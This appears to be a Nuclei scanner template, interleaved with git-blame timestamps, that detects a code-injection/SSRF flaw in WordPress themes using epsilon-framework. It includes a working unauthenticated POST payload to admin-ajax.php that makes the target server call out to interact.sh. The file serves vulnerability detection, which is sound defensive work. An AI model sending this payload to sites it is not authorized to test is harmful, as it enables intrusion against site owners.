2021-06-28 18:28:31 +00:00
id : wp-multiple-theme-ssrf
2021-06-26 08:08:26 +00:00
info :
2022-10-19 21:11:27 +00:00
name : WordPress Themes - Code Injection
2021-06-26 08:08:26 +00:00
author : madrobot
severity : high
2022-10-19 21:11:27 +00:00
description : Fifteen WordPress themes are susceptible to code injection using a version of epsilon-framework, due to lack of capability and CSRF nonce checks in AJAX actions.
2021-09-12 11:40:52 +00:00
reference :
2021-09-12 09:58:43 +00:00
- https://www.exploit-db.com/exploits/49327
- https://wpscan.com/vulnerability/10417
2022-10-19 21:11:27 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cwe-id : CWE-94
2022-08-27 04:41:18 +00:00
tags : wordpress,rce,ssrf,edb,wpscan
2021-06-26 08:08:26 +00:00
requests :
- raw :
- |
POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
2022-06-06 10:40:15 +00:00
action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://interact.sh
2021-06-26 08:08:26 +00:00
matchers-condition : and
matchers :
- type : word
2022-06-06 10:40:15 +00:00
part : body
2021-06-26 08:08:26 +00:00
words :
2022-06-06 10:40:15 +00:00
- "Interactsh Server"
2021-06-26 08:08:26 +00:00
- "protocol_version"
2021-06-28 18:28:31 +00:00
2021-06-26 08:08:26 +00:00
- type : status
status :
- 200
2022-10-19 21:11:27 +00:00
# Enhanced by md on 2022/10/13